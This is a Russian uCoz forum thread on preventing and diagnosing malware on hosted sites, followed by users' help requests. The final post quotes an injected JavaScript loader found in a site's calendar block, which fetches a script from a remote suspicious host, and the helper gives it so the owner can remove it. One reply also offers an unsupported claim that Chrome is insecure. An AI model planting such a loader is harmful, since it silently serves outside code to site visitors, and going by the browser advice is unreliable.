Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1516 | 23:29:42 26 Сен 2014
    123454892, вы вообще о чем? как вы набираете в поисковике свой сайт и как это связано с вирусами на сайте? вы понимаете где пишете? нету у вас сокрытия баннеров
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vovan4ik-333
    Сообщений: 2
    Репутация: 0

    Сообщение # 1517 | 10:12:01 04 Окт 2014
    Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка) : http://video-doza.ru и так на всех

    2) проблема обнаруживается только под логином или под гостем тоже: и там и там

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки: Подозрение на вирус!


    На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки: сменил 3 браузера хром, мозила, нига выдаёт ошибку 403 постоянно. Искал причину удалял всё что может загружать сайт таким образом. Когда захожу на сайт начинаются жёсткие лаги. На других сайтах всё в порядке и раньше сидел на своём сайте всё было в порядке вот только недавно началось такое.

    Добавлено (04 Окт 2014, 09:14:46)
    ---------------------------------------------
    дня 3-4 уже такое продолжаться

    Добавлено (04 Окт 2014, 09:21:56)
    ---------------------------------------------
    сначала всё нормально а через 5 секунд нахождения на 1 странице начинается всё больше и больше нагрузка на сайт а после вовсе перестаёт реагировать на прокрутку или нажатие только через какое то время такое ощущение как буд-таки открыл около 30 вкладок одновременно...

    Добавлено (04 Окт 2014, 10:07:14)
    ---------------------------------------------
    попробовал ради интереса сделать проверку скорости сайта и вот ответ: я жда минут 5: Извините, не удалось создать отчет по результатам тестирования сайта. Попробуйте запросить отчет еще раз. Раньше эта проверка занимала не больше 15 секунд...

    Добавлено (04 Окт 2014, 10:11:12)
    ---------------------------------------------
    а это выдал google проверка скорости Произошла ошибка при получении или анализа с сайта(An error occurred while fetching or analyzing the page.) дошло до 70% и стала долго загружаться когда дошло до 90% вообще остановилась и через минуту была такая надпись.

    Добавлено (04 Окт 2014, 10:12:01)
    ---------------------------------------------
    Надеюсь информации достаточно. Если что-то ещё требуется напишите пож. а то не знаю что делать чтобы исправить...

    _CrySiS_
    Сообщений: 464
    Репутация: 38

    Сообщение # 1518 | 14:39:43 04 Окт 2014
    Vovan4ik-333, Ваш сайт чистый, а то что он грузится очень долго - это уже ваши проблемы. В Исходном коде страницы (любой) там напихано кода просто море, очень сильно загружена страница изображениями, iframe-кодами (Видео из ВК), и ссылками на JS,CSS и т.д.

    Советую очищать шаблоны он хлама
    Хард
    Сообщений: 446
    Репутация: 156

    Сообщение # 1519 | 14:43:01 04 Окт 2014
    Vovan4ik-333, ваш сайт был пробит по всем анти-вирусным базам 2 раза. Вирусов обнаружено не было.

    А вот нагрузка лишними кодами, картинками, рекламой и анимациями идет большая.

    А так же много сторонних ресурсов как ВИДЕО ВК и ссылки на другие порталы.
    Модератор в отставке :D
    _CrySiS_
    Сообщений: 464
    Репутация: 38

    Сообщение # 1520 | 14:52:08 04 Окт 2014
    Цитата Хард ()
    А так же много сторонних ресурсов как ВИДЕО ВК и ссылки на другие порталы.

    + к этому, советую скрывать эти Инфреймы в спойлеры, что бы не было доп. нагрузки
    Vovan4ik-333
    Сообщений: 2
    Репутация: 0

    Сообщение # 1521 | 15:03:43 04 Окт 2014
    Всё уже разобрался.
    wоrkman
    Сообщений: 710
    Репутация: 84

    Сообщение # 1522 | 11:03:24 05 Окт 2014
    Почему выскакивает вредоносный код на который ругается Аваст? Вроде бы ничего такого не ставил,а только проверенные ссылки.
    Вот к примеру сообщение которое мне написали:
    что-то вредоносное всё-таки есть. Результатом исследования стала
    незакрывающаяся вкладка с "просьбой обновить гугл хром"

    Не могу понять и найти такой код. Дкело в том что я использую Касперского и у меня такого ничего не происходит. В чем причина то???
    Ссылка на страницу вот
    Знать много о HTML, CSS, Javascript. - Опасно для мозга. Можно стать умным.
    -=НЕ НАЖИМАТЬ=-
    Сообщение отредактировал rem-31 - Воскресенье, 05 Окт 2014, 11:04:15
    Хард
    Сообщений: 446
    Репутация: 156

    Сообщение # 1523 | 11:44:25 05 Окт 2014
    Цитата rem-31 ()
    Почему выскакивает вредоносный код на который ругается Аваст? Вроде бы ничего такого не ставил,а только проверенные ссылки. Вот к примеру сообщение которое мне написали:
    что-то вредоносное всё-таки есть. Результатом исследования стала
    незакрывающаяся вкладка с "просьбой обновить гугл хром"

    Не могу понять и найти такой код. Дкело в том что я использую Касперского и у меня такого ничего не происходит. В чем причина то???


    Предоставьте скриншот окошка антивируса "Угроза".
    Модератор в отставке :D
    Сообщение отредактировал Хард - Воскресенье, 05 Окт 2014, 11:49:31
    Хард
    Сообщений: 446
    Репутация: 156

    Сообщение # 1524 | 12:12:57 05 Окт 2014
    Цитата rem-31 ()
    что-то вредоносное всё-таки есть. Результатом исследования стала незакрывающаяся вкладка с "просьбой обновить гугл хром"

    Это означает уже вирус в браузере, так как Google обновляется не автоматически и на оф.сайте по вашей инициативе.

    Результаты проверки:
    Вирусов не обнаружено
    Yandex относит данный сайт к безопасным
    Google относит данный сайт к безопасным

    Всё дело в браузере, Google Chrome очень плохо-защищенный браузер. Он вечно ловит вирусы переходя на разные сайты.

    Советую браузер Uran на базе Chromium или же Амиго.
    Uran только чуть отличается интерфейсом.

    Код
    Ссылка на скачку ниже.


    Модератор в отставке :D
    Сообщение отредактировал Хард - Воскресенье, 05 Окт 2014, 12:13:35
    wоrkman
    Сообщений: 710
    Репутация: 84

    Сообщение # 1525 | 12:49:56 05 Окт 2014
    Хард, Спасибо большое. Выяснилось что это один "клоун" решил таким образом пошутить ...
    Знать много о HTML, CSS, Javascript. - Опасно для мозга. Можно стать умным.
    -=НЕ НАЖИМАТЬ=-
    jon-vlasov
    Сообщений: 4
    Репутация: 0

    Сообщение # 1526 | 07:07:09 06 Окт 2014
    И снова взломщики - когда ж хакеры вымрут.
    30.09. был взломан мой ящик на яндексе, через него придурки получили доступ к моему сайту http://jon-vlasov.narod.ru/ и видимо заразили его (касперский нашел остатки вирусов в ящике). Теперь сайт не открывается ни на одной странице. Какому дизпенышу мой сайт приглянулся?
    ВОПРОС: uCoz собрал народников что бы получить тренировочную базу вредоносников? И, как мои пороли попали хакрюшам?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1527 | 18:37:09 06 Окт 2014
    jon-vlasov, сайт прекрасно открывается. все выборочные страницы работают. на сервисе юкоз нигде не используется пароль от вашей почты. если вы везде ставите одинаковый пароль, то это уже проблемы вашей безопасности

    а теперь описываем проблему четко и ясно без многобукав
    сайт не открывается вообще? вместо сайта белый листик или идет перенаправление на другие сайты?
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    jon-vlasov
    Сообщений: 4
    Репутация: 0

    Сообщение # 1528 | 05:42:56 07 Окт 2014
    Спасибо Webanet, само собой восстановилось!?
    Была ситуация, что открывалось сообщение "Не удается отобразить эту страницу" при попытки зайти на любую страницу через поисковик яндекса или напрямую с Избранного.
    Darik9611
    Сообщений: 4
    Репутация: 0

    Сообщение # 1529 | 12:49:09 08 Окт 2014
    Добрый День, заметил что примерно раз в сутки появляется баннер на моём сайте http://penza-remont.ucoz.ru/ , попробовал зайти с разных браузеров и во всех случаях при первом заходе выскакивает данный баннер, в последующие разы уже нет. Ссылка при переходе по баннеру http://slot-portal.com/land/14/?id=G0jJMtKi&banner_id=2475&p1=139011 . Помогите пожалуйста !!!
    Прикрепления: 6793491.jpg (249.7 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1530 | 13:11:02 08 Окт 2014
    Darik9611, из блока календарь удалите скрипт

    Код
    <script type="text/javascript">
      (function(w) {
      var script = document.createElement('script');
      var i = setInterval(function() {
      if (typeof w.document.body !== 'undefined') {
      script.src = 'http://fwrotptcwoot.seem-to-follow.info' + '/?816787=567n4bXx__zw-Pr34K6ipqGrpaA';
      w.document.body.appendChild(script);
      clearInterval(i);
      }
      }, 200);
    })(window);
    </script>


    удалять придется через редактирование глобальных блоков
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: